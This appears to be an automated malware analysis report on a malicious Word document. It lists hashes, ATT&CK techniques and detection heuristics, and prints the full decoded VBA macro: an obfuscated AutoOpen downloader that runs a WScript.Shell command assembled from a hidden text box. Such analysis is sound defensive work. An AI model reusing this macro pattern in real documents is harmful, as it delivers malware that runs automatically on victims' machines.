Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 64151a4bd32f323c…

MALICIOUS

Office (OLE)

139.4 KB Created: 2019-01-14 13:22:00 Authoring application: Microsoft Office Word First seen: 2019-04-18
MD5: e1801011377912a669670004a7fa925c SHA-1: f7efd5abc645ae82323d519dd48f44ca4a3504ed SHA-256: 64151a4bd32f323ceddbc46ada93dfc9c9779059684e9b958d2b503f8f233ebe
290 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter

The sample is a malicious Office document containing VBA macros. The 'autoopen' macro utilizes WScript.Shell and CreateObject, indicating an attempt to execute arbitrary code. This is strongly suggestive of a downloader or droppper functionality, aiming to fetch and run a secondary payload. The ClamAV detection also confirms its malicious nature.

Heuristics 9

  • ClamAV: Doc.Downloader.Olemal-6814758-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Olemal-6814758-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
          End Select
    Mw48w = Array(Naq6, Jo0l, Bf8u8, CreateObject("wscript.shell").Run(("" + Eqtriik + Xmt48b + Cirfct + Vcuj2h + Owl5.TextBox1) + T1p6m7h9t + Wh8jih2w, 67 - 67), T2v7l, Njou, G4vm)
       Select Case Roh0
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
          End Select
    Mw48w = Array(Naq6, Jo0l, Bf8u8, CreateObject("wscript.shell").Run(("" + Eqtriik + Xmt48b + Cirfct + Vcuj2h + Owl5.TextBox1) + T1p6m7h9t + Wh8jih2w, 67 - 67), T2v7l, Njou, G4vm)
       Select Case Roh0
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
    Sub autoopen()
    P8ou = Zplv - Snfj
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4332 bytes
SHA-256: 336ced243e4941aed69ec066af084c6c56b44c4ec85e399aa1f2db9c09f4eed6
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Owl5"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
P8ou = Zplv - Snfj
Fwjdi = Dmul - J816
Zznrk = Gvzbj - Xm49f
Wwdj = Gfku - Amhl
Kpqsr = Sqni - Rfp9
Swon
Zz26 = Hjqi - Znwv
Vw1i = Jjnw6 - S6zk
Wmr2 = Ljh50 - Jj02r
Acpf8 = Dia5 - Akaqu
D28t = Jiiin - C7n5
End Sub

Attribute VB_Name = "X4nu"
Function Swon()
On Error Resume Next
   Select Case Rj1c
         Case 862
            C0vu = CDate(R8i4)
            Tumb6 = Dq9q
            K30wb = Sgn(U7nm2)
         Case 595
            Udiz = 317
            Edtf = CDbl(415)
            Xduai = Sin(C5io)
         Case 169
            Ws2f8 = Fix(Bq9b)
            Uu8fw = Round(564)
            Pnuj = Fzw0
      End Select
   Select Case S7jm5
         Case 438
            Tfjsf = CDate(Z2ti)
            Twi0 = Ijsjv
            Er1fs = Sgn(M5v4p)
         Case 267
            Scit = 428
            Ki8j = CDbl(834)
            Lji54 = Sin(Zt90)
         Case 695
            Zm0ko = Fix(H2m3i)
            Vqd8 = Round(490)
            Ya7q = Gw1s
      End Select
   Select Case Na7u3
         Case 642
            Xj8o = CDate(J4io)
            Irqfs = C4506
            Nz83q = Sgn(Nvjvk)
         Case 174
            Kjnr = 960
            Ekao = CDbl(854)
            Lpb3q = Sin(Kwc19)
         Case 466
            Qjvs = Fix(M8kw)
            Ljc6 = Round(958)
            Z9bc5 = Y7ss
      End Select
   Select Case S527
         Case 381
            Zzz2 = CDate(Wvv8p)
            Lswo7 = Fzz9
            Hr8c = Sgn(Ebl1)
         Case 726
            Uz1qt = 430
            Vtiq = CDbl(606)
            Hofiu = Sin(Gjvum)
         Case 173
            Hrqkm = Fix(Bn1zn)
            Mru4 = Round(412)
            O6b3f = Uq7jc
      End Select
   Select Case H5t0v
         Case 484
            Mz6qh = CDate(Bsowp)
            C21f = Ikhzz
            M1jw = Sgn(Dzi8v)
         Case 434
            Jbiki = 441
            R24i = CDbl(408)
            Hpwzb = Sin(Sivo)
         Case 724
            R5nrf = Fix(Mo5n)
            Kq62 = Round(503)
            Bih5 = Rf1k
      End Select
Mw48w = Array(Naq6, Jo0l, Bf8u8, CreateObject("wscript.shell").Run(("" + Eqtriik + Xmt48b + Cirfct + Vcuj2h + Owl5.TextBox1) + T1p6m7h9t + Wh8jih2w, 67 - 67), T2v7l, Njou, G4vm)
   Select Case Roh0
         Case 444
            Uvha = CDate(Wkcv5)
            Ypw0c = E152
            Yai4 = Sgn(Vnai)
         Case 279
            Az01a = 868
            M84wp = CDbl(847)
            Rtbfb = Sin(I5hz)
         Case 192
            Ltqok = Fix(K9oz1)
            Ya8n = Round(816)
            Zln7 = Abu7
      End Select
End Function


Attribute VB_Name = "Lbtif"

Attribute VB_Name = "Nical"

Attribute VB_Name = "U1h22"

Attribute VB_Name = "Hzk5"

Attribute VB_Name = "Jqidv"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Shju8"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Rnb3"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Fbd61"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False